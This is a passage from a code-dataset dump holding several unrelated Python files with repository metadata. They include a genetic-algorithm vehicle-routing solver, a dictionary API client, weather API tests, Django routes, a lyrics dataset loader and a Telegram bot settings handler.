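# (added note) 2-opt reverses the segment between two cut points whenever the\n # reversal shortens the route, e.g. [0, 1, 4, 3, 2, 5, 0] -> [0, 1, 2, 3, 4, 5, 0]\n # when undoing the 4-3-2 detour reduces the total distance.\n 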
def opt(self,route, k=2):\n # optimise a route with the 2-opt algorithm\n # input: route -- sequence recording the path\n # output: the optimised route optimizedRoute and its length\n dataDict = self.dataDict\n nCities = len(route) # number of nodes\n optimizedRoute = route # best route so far\n minDistance = self.calRouteLen([route]) # best route length so far\n for i in range(1,nCities-2):\n for j in range(i+k, nCities):\n if j-i == 1:\n continue\n reversedRoute = route[:i]+route[i:j][::-1]+route[j:] # route with the segment reversed\n reversedRouteDist = self.calRouteLen([reversedRoute])\n # if the reversed route is better, keep it as the new best\n if reversedRouteDist < minDistance:\n minDistance = reversedRouteDist\n optimizedRoute = reversedRoute\n return optimizedRoute\n\n def mutate(self,ind):\n '''Locally optimise each sub-route with the 2-opt algorithm'''\n routes = self.decodeInd(ind)\n optimizedAssembly = []\n for eachRoute in routes:\n optimizedRoute = self.opt(eachRoute)\n optimizedAssembly.append(optimizedRoute)\n # reassemble the routes into a chromosome\n child = []\n for eachRoute in optimizedAssembly:\n child += eachRoute[:-1]\n ind[:] = child+[0]\n return ind,\n def predict(self):\n toolbox = base.Toolbox()\n toolbox.register('individual', tools.initIterate, creator.Individual, self.genInd)\n toolbox.register('population', tools.initRepeat, list, toolbox.individual)\n toolbox.register('evaluate', self.evaluate)\n toolbox.register('select', tools.selTournament, tournsize=2)\n toolbox.register('mate', self.crossover)\n toolbox.register('mutate', self.mutate)\n\n ## build the initial population\n toolbox.popSize = 100\n pop = toolbox.population(toolbox.popSize)\n\n ## track per-generation statistics\n stats=tools.Statistics(key=lambda ind: ind.fitness.values)\n stats.register('min', np.min)\n stats.register('avg', np.mean)\n stats.register('std', np.std)\n hallOfFame = tools.HallOfFame(maxsize=1)\n\n ## GA parameters\n toolbox.ngen = 50\n\n toolbox.cxpb = 0.8\n toolbox.mutpb = 0.1\n\n ## GA main loop\n pop,logbook=algorithms.eaMuPlusLambda(pop, toolbox, mu=toolbox.popSize, \n lambda_=toolbox.popSize,cxpb=toolbox.cxpb, mutpb=toolbox.mutpb,\n ngen=toolbox.ngen ,stats=stats, halloffame=hallOfFame, verbose=True)\n tour = tools.selBest(pop, k=1)[0]\n logavg = [d['avg'] for d in logbook]\n logmin = [d['min'] for d in logbook]\n loggen = [d['gen'] for d in logbook]\n real_tour = []\n tour_decode = self.decodeInd(tour)\n finaltour = deepcopy(tour_decode)\n # map node indices back to their original labels via fullDict\n for i in range(len(tour_decode)):\n for j in range(len(tour_decode[i])):\n for k,v in self.fullDict.items():\n if v == self.dataDict['NodeCoor'][tour_decode[i][j]]:\n finaltour[i][j] = k\n\n return finaltour\n\n\nif __name__ == '__main__':\n #-----------------------------------\n ## register the GA operators and run the solver\n # NOTE: DeapVrp requires NodeCoor, Demand, MaxLoad and fullDict -- supply\n # real problem data before running.\n # deap = DeapVrp(NodeCoor, Demand, MaxLoad, fullDict)\n # deap.predict()\n","repo_name":"1sucong/GeneVrp","sub_path":"sucong/norm_model.py","file_name":"norm_model.py","file_ext":"py","file_size_in_byte":10435,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"37303874834","text":"import time\nfrom logging import Logger\nfrom typing import Any, Optional\nfrom urllib.parse import urljoin\n\nimport httpx\n\nfrom .items import MiniCard\n\n\nclass Client:\n \"\"\"Lingvo Live API client.\"\"\"\n SERVICE_URL = 'https://developers.lingvolive.com/'\n USER_AGENT = 'LingCApp/0.1'\n\n def __init__(self, key: str, timeout: float, logger: Logger, verbose: bool = False) -> None:\n self.key = key\n self.token: Optional[str] = None\n\n self.timeout = timeout\n self.logger = logger\n self.verbose = verbose\n\n @staticmethod\n def duration_ms_from(start: int) -> float:\n \"\"\"\n Return the elapsed time in milliseconds,\n where start is a time.monotonic_ns() value.\n \"\"\"\n return (time.monotonic_ns() - start) / 1_000_000\n\n @property\n def base_headers(self) -> dict[str, str]:\n return {\n 'User-Agent': self.USER_AGENT,\n 'Content-Length': '0',\n }\n\n def url(self, path: str) -> str:\n \"\"\"Returns the full URL for a custom request path.\"\"\"\n return urljoin(self.SERVICE_URL, path)\n\n def authenticate(self) -> bool:\n url = self.url('api/v1.1/authenticate')\n headers = self.base_headers\n headers.update({'Authorization': f'Basic {self.key}'})\n\n try:\n response = httpx.post(url, headers=headers, timeout=self.timeout)\n except httpx.RequestError as exc:\n self.logger.error(f'Error: {exc}')\n return False\n\n if response.status_code != httpx.codes.OK:\n self.logger.error(f'Error: {response.status_code} {response.reason_phrase}')\n return False\n\n self.token = response.text.strip('\"')\n return True\n\n async def _common_translate(self, client: httpx.AsyncClient, url: str, params: dict[str, Any]) -> Optional[dict]:\n headers = self.base_headers\n headers.update({'Authorization': f'Bearer {self.token}'})\n\n try:\n response = await client.get(url, params=params, headers=headers)\n response.raise_for_status()\n except httpx.HTTPError as exc:\n self.logger.error(f'Error: {exc}')\n return\n\n 
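# a 2xx response reaches this point, so hand back the parsed JSON body\n 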
return response.json()\n\n async def mini_card(self, client: httpx.AsyncClient, text: str, src: int, dst: int) -> Optional[MiniCard]:\n start = time.monotonic_ns()\n url = self.url('api/v1/Minicard')\n params = {'text': text, 'srcLang': src, 'dstLang': dst}\n\n data = await self._common_translate(client, url, params)\n if not data:\n return\n\n duration = self.duration_ms_from(start) if self.verbose else 0.0\n return MiniCard(\n heading=data['Heading'],\n translation=data['Translation']['Translation'],\n dictionary=data['Translation']['DictionaryName'],\n duration=duration,\n )\n\n async def translate(self, client: httpx.AsyncClient, text: str, src: int, dst: int) -> Optional[dict]:\n url = self.url('api/v1/Translation')\n params = {'text': text, 'srcLang': src, 'dstLang': dst}\n\n return await self._common_translate(client, url, params)\n","repo_name":"z0rr0/lingcapp","sub_path":"app/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24476330077","text":"import aiohttp\nimport pytest\n\nfrom app import api_get_weather\nfrom app.config import settings as test_settings\n\n\n@pytest.fixture\n@pytest.mark.asyncio\nasync def client_session():\n session = aiohttp.ClientSession()\n yield session\n await session.close()\n\n\n@pytest.mark.asyncio\nasync def test_celsius(client_session):\n # ok request for celsius degrees\n res = await api_get_weather(test_settings.WEATHER_API_KEY, 'London', 'm', client_session)\n assert 'error' not in res\n\n\n@pytest.mark.asyncio\nasync def test_fahrenheit(client_session):\n # ok request for fahrenheit degrees\n res = await api_get_weather(test_settings.WEATHER_API_KEY, 'London', 'f', client_session)\n assert 'error' not in res\n\n\n@pytest.mark.asyncio\nasync def test_bad_units(client_session):\n # bad request: unsupported degrees type\n res = await api_get_weather(test_settings.WEATHER_API_KEY, 'London', 'some_units', client_session)\n assert 'error' in res\n\n\n@pytest.mark.asyncio\nasync def test_bad_city(client_session):\n # bad request: city name doesn't exist\n res = await api_get_weather(test_settings.WEATHER_API_KEY, '12j3i1l23n123', 'm', client_session)\n assert 'error' in res\n\n\n@pytest.mark.asyncio\nasync def test_bad_city_and_units(client_session):\n res = await api_get_weather(test_settings.WEATHER_API_KEY, 'UnknownCity', 'some_units', client_session)\n assert 'error' in res\n","repo_name":"SuperSolik/epam-python-test-task","sub_path":"tests/test_api_call.py","file_name":"test_api_call.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11344045971","text":"from django.urls import path\nfrom . 
import views\nfrom django.conf import settings\nfrom django.contrib.staticfiles.urls import static\n\n\nurlpatterns = [\n \n \n path('home',views.Home,name=\"Home\"),\n path('servicios',views.servicios, name=\"Servicios\"),\n path('tienda',views.tienda, name=\"Tienda\"),\n path('registrate',views.registrate, name=\"Registrate\"),\n path('Bas',views.Bas, name=\"Bas\"),\n path('funcion', views.funcion,name='funcion'),\n path('ferreteria', views.ferreteria,name='ferreteria'),\n path('crear', views.crear,name='crear'),\n path('eliminar', views.eliminar,name='eliminar'),\n path('editar', views.editar,name='editar'),\n path('index', views.index,name='index'),\n path('header', views.header,name='header'),\n \n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT )\n\n","repo_name":"LSant11/Trabajo-adicional-de-desarrollo","sub_path":"Aplicacion/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69898046227","text":"import os\n\ndef delete_empty_folders(directory):\n\tfor root, dirs, files in os.walk(directory, topdown=False):\n\t\tfor folder in dirs:\n\t\t\tfolder_path = os.path.join(root, folder)\n\t\t\tif not os.listdir(folder_path): # an empty listing means the folder is empty\n\t\t\t\tprint(f\"Deleting empty folder: {folder_path}\")\n\t\t\t\tos.rmdir(folder_path)\n\nif __name__ == \"__main__\":\n\ttarget_directory = r\"F:\\Development\\Packer - Dev\\Client\"\n\tdelete_empty_folders(target_directory)\n","repo_name":"vaynz/clear-useless-folders","sub_path":"shit.py","file_name":"shit.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29663927676","text":"from collections import Counter\nfrom dataclasses import dataclass\n\nfrom django.db.models import QuerySet\nfrom wordcloud import WordCloud\n\nfrom press.models import Post\n\n\nclass StatsDict(dict):\n\n def top(self, limit=10):\n return self._get_top(self, limit)\n\n @staticmethod\n def _get_top(dict_to_limit: dict, limit=10):\n sorted_items = sorted(dict_to_limit.items(), key=lambda item: (-item[1], item[0]))\n keys = [key for key, val in sorted_items][:limit]\n top_dict = StatsDict()\n for key in keys:\n value = dict_to_limit[key]\n top_dict[key] = value\n\n return top_dict\n\n @classmethod\n def from_msg(cls, msg: str):\n tokens = msg.split(' ')\n return cls(**Counter(tokens))\n\n def word_cloud(self, limit=15):\n freqs_weighted = get_weighted_frequencies(self)\n top_weighted_values = self._get_top(freqs_weighted, limit)\n wc = WordCloud()\n wc.fit_words(top_weighted_values)\n return wc\n\n def word_cloud_svg(self, limit=15):\n wc = self.word_cloud(limit)\n return wc.to_svg()\n\n\n@dataclass\nclass Stats:\n titles: StatsDict\n bodies: StatsDict\n\n @property\n def all(self):\n return StatsDict({**self.titles, **self.bodies})\n\n\ndef extract_single_post_stats(post: Post):\n titles_stats = StatsDict.from_msg(post.title)\n bodies_stats = StatsDict.from_msg(post.body)\n return Stats(titles=titles_stats, bodies=bodies_stats)\n\n\ndef extract_posts_stats(posts: QuerySet[Post]):\n titles = posts.values_list('title', flat=True)\n bodies = posts.values_list('body', flat=True)\n if not titles and not bodies:\n return None\n\n titles_msgs = ' '.join(titles)\n bodies_msgs = ' '.join(bodies)\n titles_stats = StatsDict.from_msg(titles_msgs)\n bodies_stats = StatsDict.from_msg(bodies_msgs)\n return Stats(titles=titles_stats, 
bodies=bodies_stats)\n\n\ndef get_weighted_frequencies(text_frequencies: StatsDict):\n weighted = {}\n for key, value in text_frequencies.items():\n value = len(key) or 1\n if 3 < len(key) < 15:\n value = len(key) ** 2\n elif len(key) >= 15:\n value = 1\n weighted[key] = value\n return weighted\n\n\ndef word_cloud_to_filename(text_frequencies: StatsDict, filename):\n # This would be an exercise for the students\n wc = text_frequencies.word_cloud()\n wc.to_file(filename)\n return filename\n","repo_name":"tuxskar/coolpress","sub_path":"coolpress/press/stats_manager.py","file_name":"stats_manager.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"42322042935","text":"import os\nimport re\nimport zipfile\nimport math\nimport pandas as pd\nfrom datasets import load_dataset, concatenate_datasets, Dataset, DatasetDict\nfrom transformers import AutoTokenizer\npd.options.mode.chained_assignment = None # Remove chained assignment warning\n\nclass LyricsDataset():\n def __init__(self, config, filter_field, dataset_id, performance_evaluation_nremovals=None):\n self.config = config\n self.filter_field = filter_field\n self.dataset_id = dataset_id\n self.performance_evaluation_nremovals = performance_evaluation_nremovals\n self.dataset_zip = self.config[\"dataset_zip\"][self.dataset_id]\n self.tokenizer = AutoTokenizer.from_pretrained(self.config[\"model\"])\n self.tokenizer.pad_token = self.tokenizer.eos_token\n self.files_to_delete = [\"(Scriptonite)\", \"BTS\", \"Damso\", \"Genius English Translations\", \"Genius Romanizations\", \"JuL\", \"Nekfeu\", \"Oxxxymiron\"]\n self.files_to_multiartist = [\"50 Cent\", \"Imagine Dragons\", \"Justin Bieber\", \"Taylor Swift\", \"Queen\", \"Lil Peep\", \"Arctic Monkeys\", \"The Notorious B.I.G.\", \"Radiohead\", \"Mac Miller\"]\n self.dataset=\"\"\n self.true_lyrics_dataset=[]\n\n # Obtain selected dataset specific folder\n archive_name=re.sub(r'^.*?/', '',self.dataset_zip)\n archive_name=re.sub(r'.zip','',archive_name)\n self.dataset_dir = archive_name\n print(archive_name)\n\n # Check wether selected database matches downloaded database\n if not os.path.exists(os.path.join(config[\"dataset_path\"],self.dataset_dir)) or not os.listdir(os.path.join(config[\"dataset_path\"],self.dataset_dir)):\n print(os.path.join(self.config[\"base_dir\"], self.dataset_zip))\n with zipfile.ZipFile(os.path.join(self.config[\"base_dir\"], self.dataset_zip), 'r') as zip_ref:\n zip_ref.extractall(os.path.join(self.config[\"base_dir\"], self.config[\"dataset_path\"], self.dataset_id))\n print(\"Successfully extracted the contents of the zip file.\")\n else:\n print(\"The\", os.path.join(self.config[\"base_dir\"], self.config[\"dataset_path\"], self.dataset_dir), \"folder is not empty. 
Skipping extraction.\")\n \n if self.dataset_id == 'genius-lyrics':\n # Remove non english authors from dataset \n for file_name in self.files_to_delete:\n file_path = os.path.join(self.config[\"dataset_path\"], self.dataset_dir,f\"{file_name}.csv\")\n if os.path.exists(file_path):\n os.remove(file_path)\n print(f\"Deleted file: {file_path}\")\n else:\n print(f\"File not found: {file_path}\")\n\n def load_dataset_single_artist(self):\n \"\"\"Loads a dataset from a specific artist and stores its cleaned version\"\"\"\n if self.dataset_id == 'genius-lyrics':\n csv_path = os.path.join(self.config[\"base_dir\"], self.config[\"dataset_path\"], self.dataset_dir, self.filter_field + \".csv\")\n \n # Check wether performance evaluation needs to be computed\n if(self.performance_evaluation_nremovals):\n csvFile = pd.read_csv(csv_path)\n csvFile = self.__preprocess_lyrics(csvFile)\n self.dataset = self.__split_train_custom_eval(csvFile, test_size=self.config[\"val_size\"])\n else:\n csvFile = load_dataset(\"csv\", data_files=csv_path, split=\"train\")\n csvFile = csvFile.map(self.__preprocess_lyrics_single_artist)\n self.dataset = csvFile.select_columns(\"lyrics\").train_test_split(test_size=self.config[\"val_size\"])\n\n elif self.dataset_id == '79-musical-genres':\n artists_csv_path = os.path.join(self.config[\"base_dir\"], self.config[\"dataset_path\"], self.dataset_dir + \"/artists-data.csv\")\n lyrics_csv_path = os.path.join(self.config[\"base_dir\"], self.config[\"dataset_path\"], self.dataset_dir + \"/lyrics-data.csv\")\n artistsCsvFile = pd.read_csv(artists_csv_path)\n lyricsCsvFile = pd.read_csv(lyrics_csv_path)\n\n # Merge both databases\n csvFile = lyricsCsvFile.merge(artistsCsvFile[['Artist', 'Genres', 'Popularity', 'Link']], left_on='ALink', right_on='Link', how='inner')\n csvFile = self.__preprocess_lyrics_single_artist(csvFile)\n if self.performance_evaluation_nremovals == None:\n self.dataset = Dataset.from_pandas(csvFile).select_columns(\"Lyric\").train_test_split(test_size=self.config[\"val_size\"])\n else:\n self.dataset = self.__split_train_custom_eval(csvFile, test_size=self.config[\"val_size\"])\n \n\n def load_dataset_multiple_artists(self):\n \"\"\"Loads several datasets from different artists and stores its cleaned version\"\"\"\n if self.dataset_id == 'genius-lyrics':\n folder_path = os.path.join(self.config[\"base_dir\"], self.config[\"dataset_path\"], self.dataset_dir)\n csv_files = [filename for filename in os.listdir(folder_path) if filename.endswith(\".csv\")]\n csv_files_to_keep = [filename for filename in csv_files if any(artist in filename for artist in self.files_to_multiartist)]\n print(\"csv_files: \", csv_files)\n print(\"csv_files_to_keep: \", csv_files_to_keep)\n datasets = []\n # Append preprocess selected multiple artists datasets\n for file in csv_files_to_keep:\n print(\"FILE: \", file)\n csv_path = os.path.join(self.config[\"base_dir\"], self.config[\"dataset_path\"], self.dataset_dir, file)\n # Check wether performance evaluation needs to be computed\n if(self.performance_evaluation_nremovals):\n csvFile = pd.read_csv(csv_path)\n # csvFile = csvFile.filter(lambda row: row['lyrics'] is not None and row['artist'] is not None)\n csvFile = self.__preprocess_lyrics_multiple_artists(csvFile)\n csvFile = csvFile[csvFile.columns.intersection(['lyrics'])]\n datasets.append(csvFile)\n else:\n csvFile = load_dataset(\"csv\", data_files=csv_path, split=\"train\")\n csvFile = csvFile.filter(lambda row: row['lyrics'] is not None and row['artist'] is not None)\n 
csvFile = csvFile.map(self.__preprocess_lyrics_multiple_artists)\n csvFile = csvFile.select_columns(\"lyrics\")\n datasets.append(csvFile)\n\n if(self.performance_evaluation_nremovals):\n # Concatenate datasets and store it internally\n csvFile = pd.concat(datasets)\n # shuffle concatenated datasets\n csvFile = csvFile.sample(frac=1)\n csvFile = csvFile.reset_index()\n self.dataset = self.__split_train_custom_eval(csvFile, test_size=self.config[\"val_size\"])\n else:\n # Concatenate datasets and store it internally\n self.dataset = concatenate_datasets(datasets)\n self.dataset = self.dataset.train_test_split(test_size=self.config[\"val_size\"])\n print(\"combined_dataset: \", self.dataset)\n elif self.dataset_id == '79-musical-genres':\n artists_csv_path = os.path.join(self.config[\"base_dir\"], self.config[\"dataset_path\"], self.dataset_dir + \"/artists-data.csv\")\n lyrics_csv_path = os.path.join(self.config[\"base_dir\"], self.config[\"dataset_path\"], self.dataset_dir + \"/lyrics-data.csv\")\n artistsCsvFile = pd.read_csv(artists_csv_path)\n lyricsCsvFile = pd.read_csv(lyrics_csv_path)\n \n # Merge both databases\n csvFile = lyricsCsvFile.merge(artistsCsvFile[['Artist', 'Genres', 'Popularity', 'Link']], left_on='ALink', right_on='Link', how='inner')\n csvFile = self.__preprocess_lyrics_multiple_artists(csvFile)\n # Modify test dataset in case we want to evaluate performance\n if self.performance_evaluation_nremovals == None:\n self.dataset = Dataset.from_pandas(csvFile).select_columns(\"Lyric\").train_test_split(test_size=self.config[\"val_size\"])\n else:\n self.dataset = self.__split_train_custom_eval(csvFile, test_size=self.config[\"val_size\"])\n\n def tokenize(self, element):\n \"\"\"Tokenizes a loaded dataset containing a lyrics section\"\"\"\n context_length = 128\n input_batch = []\n\n if self.dataset_id == 'genius-lyrics':\n outputs = self.tokenizer(\n element[\"lyrics\"],\n truncation=True,\n max_length=context_length,\n #padding=\"max_length\",\n return_overflowing_tokens=True,\n return_length=True,\n )\n elif self.dataset_id == '79-musical-genres':\n outputs = self.tokenizer(\n element[\"Lyric\"],\n truncation=True,\n max_length=context_length,\n #padding=\"max_length\",\n return_overflowing_tokens=True,\n return_length=True,\n )\n\n for length, input_ids in zip(outputs[\"length\"], outputs[\"input_ids\"]):\n input_batch.append(input_ids)\n return {\"input_ids\": input_batch}\n \n def __preprocess_lyrics_single_artist(self, data):\n \"\"\"Preprocesses lyrics by removing first line and text between square brakets\"\"\"\n if self.dataset_id == 'genius-lyrics':\n # Remove the first line\n if data['lyrics'] is not None:\n data['lyrics'] = data['lyrics'].split('\\n', 1)[-1]\n \n # Remove text between square brackets\n data['lyrics'] = re.sub(r'\\[.*?\\]', '', data['lyrics'])\n data['lyrics'] = data['lyrics'].strip()\n data['lyrics'] = re.sub(r'[-+]?(\\d+).(\\d+)KEmbed', '', data['lyrics'])\n data['lyrics'] = re.sub(r'[-+]?(\\d+)KEmbed', '', data['lyrics'])\n data['lyrics'] = re.sub(r'KEmbed', '', data['lyrics'])\n data['lyrics'] = re.sub(r'[-+]?(\\d+).(\\d+)Embed', '', data['lyrics'])\n data['lyrics'] = re.sub(r'[-+]?(\\d+)Embed', '', data['lyrics'])\n data['lyrics'] = re.sub(r'Embed', '', data['lyrics'])\n else:\n data['lyrics'] = \"\"\n\n elif self.dataset_id == '79-musical-genres':\n # Select only english songs\n data = data[data['language']=='en']\n\n # Apply genre filter\n if(self.filter_field):\n data = data[data['Artist'].str.contains(self.filter_field, case=False, 
na=False)]\n data = data.reset_index()\n\n \n '''split_data = [j.split() for j in data['Lyric'].split('\\n')]\n split_data = list(filter(None, split_data))\n data['Lyric'] = '\\n'.join(' '.join(v) for v in split_data)'''\n data['Lyric'] = data['Lyric'].apply(lambda x: re.sub(r'\\[.*?\\]', '', x))\n data['Lyric'] = data['Lyric'].apply(lambda x: re.sub(r'\\(.*?\\)', '', x))\n \n data = data.drop(columns=['ALink','SLink','Link','Popularity'])\n\n return data\n \n def __preprocess_lyrics(self, data):\n \"\"\"Preprocesses lyrics by removing first line and text between square brakets\"\"\"\n if self.dataset_id == 'genius-lyrics':\n for i in range(len(data['lyrics'])):\n if isinstance(data['lyrics'][i], str):\n # Remove the first line\n data['lyrics'][i] = data['lyrics'][i].split('\\n', 1)[-1]\n \n # Remove text between square brackets\n data['lyrics'][i] = re.sub(r'\\[.*?\\]', '', data['lyrics'][i])\n data['lyrics'][i] = data['lyrics'][i].strip()\n\n # Remove double break lines\n split_data = [j.split() for j in data['lyrics'][i].split('\\n')]\n split_data = list(filter(None, split_data))\n data['lyrics'][i] = '\\n'.join(' '.join(v) for v in split_data)\n\n # Remove last word from lyrics i.e. 1.6KEmbed?\n data['lyrics'][i] = re.sub(r'[-+]?(\\d+).(\\d+)KEmbed', '', data['lyrics'][i])\n data['lyrics'][i] = re.sub(r'[-+]?(\\d+)KEmbed', '', data['lyrics'][i])\n data['lyrics'][i] = re.sub(r'KEmbed', '', data['lyrics'][i])\n data['lyrics'][i] = re.sub(r'[-+]?(\\d+).(\\d+)Embed', '', data['lyrics'][i])\n data['lyrics'][i] = re.sub(r'[-+]?(\\d+)Embed', '', data['lyrics'][i])\n data['lyrics'][i] = re.sub(r'Embed', '', data['lyrics'][i])\n else:\n data['lyrics'][i] = \"\"\n elif self.dataset_id == '79-musical-genres':\n pass\n\n return data\n\n def __preprocess_lyrics_multiple_artists(self, data):\n \"\"\"Preprocesses multiple artists lyrics\"\"\"\n if self.dataset_id == 'genius-lyrics':\n if self.performance_evaluation_nremovals:\n data = self.__preprocess_lyrics(data)\n else:\n data = self.__preprocess_lyrics_single_artist(data)\n data['lyrics'] = data['artist'] + \": \" + data['lyrics']\n elif self.dataset_id == '79-musical-genres':\n # Select only english songs\n data = data[data['language']=='en']\n\n # Apply genre filter\n if(self.filter_field == 'multipleArtists'):\n data = data[data['Artist'].str.contains(self.filter_field, case=False, na=False)]\n elif(self.filter_field):\n data = data[(data['Genres'].isin([self.filter_field])) & (data['Popularity']>5)]\n data = data.reset_index()\n\n # Remove double break lines\n for i in range(len(data['Lyric'])):\n split_data = [j.split() for j in data['Lyric'][i].split('\\n')]\n split_data = list(filter(None, split_data))\n data['Lyric'][i] = '\\n'.join(' '.join(v) for v in split_data)\n \n data = data.drop(columns=['ALink','SLink','Link','Popularity'])\n\n return data\n\n def __split_train_custom_eval(self, csvFile, test_size):\n \"\"\"Custom train - eval set split\"\"\"\n n_train = math.ceil((1.0 - test_size) * len(csvFile))\n n_test = math.ceil(test_size * len(csvFile))\n n_train, n_test = int(n_train), int(n_test)\n print(\"n_train: \", n_train, \" n_test: \", n_test)\n test_set = csvFile.sample(n = n_test)\n train_set = csvFile.loc[~csvFile.index.isin(test_set.index)]\n train_set = train_set.reset_index()\n\n # remove last n verses from test set\n test_set = test_set.reset_index()\n if(self.dataset_id=='genius-lyrics'):\n #test_set['lyrics'] = self.__remove_last_verses_from_dataset(test_set['lyrics'], test_set['lyrics'], 
n=self.performance_evaluation_nremovals)\n test_set['lyrics'] = self.__remove_last_words_from_dataset(test_set['lyrics'], test_set['lyrics'], n=self.performance_evaluation_nremovals)\n train_set = csvFile.loc[~csvFile.index.isin(test_set.index)]\n # Create datasets\n train_dataset = Dataset.from_pandas(train_set).select_columns(\"lyrics\")\n test_dataset = Dataset.from_pandas(test_set).select_columns(\"lyrics\")\n elif(self.dataset_id=='79-musical-genres'):\n #test_set['Lyric'] = self.__remove_last_verses_from_dataset(test_set['Lyric'], test_set['Lyric'], n=self.performance_evaluation_nremovals)\n test_set['Lyric'] = self.__remove_last_words_from_dataset(test_set['Lyric'], test_set['Lyric'], n=self.performance_evaluation_nremovals)\n train_set = csvFile.loc[~csvFile.index.isin(test_set.index)]\n train_dataset = Dataset.from_pandas(train_set).select_columns(\"Lyric\")\n test_dataset = Dataset.from_pandas(test_set).select_columns(\"Lyric\")\n \n # Concatenating train_dataset and test_dataset\n dataset=DatasetDict({'train': train_dataset, 'test': test_dataset})\n\n return dataset\n \n def __remove_last_verses_from_dataset(self, dataset_candidate, dataset_reference, n):\n \"\"\"Deletes last n verses from specified dataset\"\"\"\n split_true_lyrics_dataset = []\n for i in range(len(dataset_candidate)):\n # Remove last n sentences\n split_dataset = dataset_candidate[i].split('\\n')\n split_true_lyrics_dataset = dataset_reference[i].split('\\n')\n for j in range(0, n):\n split_dataset.pop()\n for j in range(0, len(split_true_lyrics_dataset)-n):\n split_true_lyrics_dataset.pop(0)\n # Join datasets\n self.true_lyrics_dataset.append('\\n'.join(split_true_lyrics_dataset))\n dataset_candidate[i] = '\\n'.join(split_dataset)\n return dataset_candidate\n\n def __remove_last_words_from_dataset(self, dataset_candidate, dataset_reference, n):\n \"\"\"Deletes last n words from specified dataset\"\"\"\n split_true_lyrics_dataset = []\n for i in range(len(dataset_candidate)):\n # Remove last n words\n split_dataset = [j.split() for j in dataset_candidate[i].split('\\n')]\n split_true_lyrics_dataset = [j.split() for j in dataset_reference[i].split('\\n')]\n word_count=0\n for j in reversed(range(0,len(split_dataset))):\n if split_dataset[j] != '[]':\n for k in reversed(range(len(split_dataset[j]))):\n if word_count >= n:\n split_true_lyrics_dataset[j].pop(k)\n else:\n #print(\"removed word count: \", word_count, \" removed word: \", split_dataset[j][k])\n split_dataset[j].pop(k)\n word_count+=1\n else:\n continue\n if(word_count != n):\n print('Only removed ' + str(word_count) + ' words from data')\n print('test set reference ' + i + ' length was: ' + str(dataset_reference[i]) + '...')\n # Join datasets\n split_dataset = list(filter(None, split_dataset))\n split_true_lyrics_dataset = list(filter(None, split_true_lyrics_dataset))\n self.true_lyrics_dataset.append('\\n'.join(' '.join(v) for v in split_true_lyrics_dataset))\n dataset_candidate[i] = '\\n'.join(' '.join(v) for v in split_dataset)\n return dataset_candidate","repo_name":"DanielLosada/Transformers---Lyrics-Generator","sub_path":"gpt2-model/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":18787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70308159826","text":"import json\nfrom telethon import events, Button\nfrom asyncio import exceptions\nfrom .. 
import jdbot, chat_id, _botset\nfrom .utils import split_list, logger,press_event\n\n\n@jdbot.on(events.NewMessage(from_users=chat_id, pattern='^/set$'))\nasync def myset(event):\n    SENDER = event.sender_id\n    try:\n        msg = await jdbot.send_message(chat_id,'Please wait, querying your settings')\n        with open(_botset,'r',encoding='utf-8') as f:\n            myset = json.load(f)\n        info = 'Your current settings are as follows:\\n'\n        for i in myset:\n            info = info + f'\\t\\t- {i}-->{myset[i]} \\n'\n        info = info + 'Tap the item you want to configure, then enter the new value (takes effect after a restart); separate trash-talk entries with | and blacklist entries with spaces or commas'\n        btn = [Button.inline(i,i) for i in myset]\n        btn.append(Button.inline('Cancel', data='cancel'))\n        btn = split_list(btn,3)\n        async with jdbot.conversation(SENDER, timeout=60) as conv:\n            msg = await jdbot.edit_message(msg,info,buttons=btn)\n            convdata = await conv.wait_event(press_event(SENDER))\n            res = bytes.decode(convdata.data)\n            if res == 'cancel':\n                msg = await jdbot.edit_message(msg, 'The conversation has been cancelled')\n                conv.cancel()\n            else:\n                await jdbot.delete_messages(chat_id,msg)\n                msg = await conv.send_message(f'Please enter the new value for {res}\\nCapitalize the first letter if it is True or False\\n```{myset[res]}```')\n                data = await conv.get_response()\n                myset[res] = data.raw_text\n                with open(_botset,'w+',encoding='utf-8') as f:\n                    json.dump(myset,f)\n                await jdbot.delete_messages(chat_id,msg)\n                await jdbot.send_message(chat_id,'Settings updated; the change takes effect after a restart')\n    except exceptions.TimeoutError:\n        msg = await jdbot.edit_message(msg, 'Selection timed out; the conversation has stopped')\n    except Exception as e:\n        msg = await jdbot.edit_message(msg, f'something went wrong, I\\'m sorry\\n{str(e)}')\n        logger.error(f'something went wrong, I\\'m sorry\\n{str(e)}')\n","repo_name":"yxj1028530975/jd_scripts-3","sub_path":"jbot/bot/setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21377616772","text":"from .simulation import *\r\n\r\nif __name__ == '__main__':\r\n    print('*' * 50)\r\n    \r\n    system = None\r\n    if simulation_type == 'BarnesHut':\r\n        system = RenderableBarnesHutSystem()\r\n    elif simulation_type == 'BruteForce':\r\n        system = RenderableBruteForceSystem()\r\n\r\n    system.start_the_bodies(int(bodies))\r\n    renderer = SystemRenderer(system, frames=int(frames), trail_size=int(trail_size), performance_test=performance_test)\r\n\r\n    renderer.run()\r\n\r\n","repo_name":"Naimish240/CrudeBHT","sub_path":"CrudeBHT/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"4824674870","text":"from torch.utils.data import DataLoader\n\nimport models\nimport data_handler\nfrom collections import 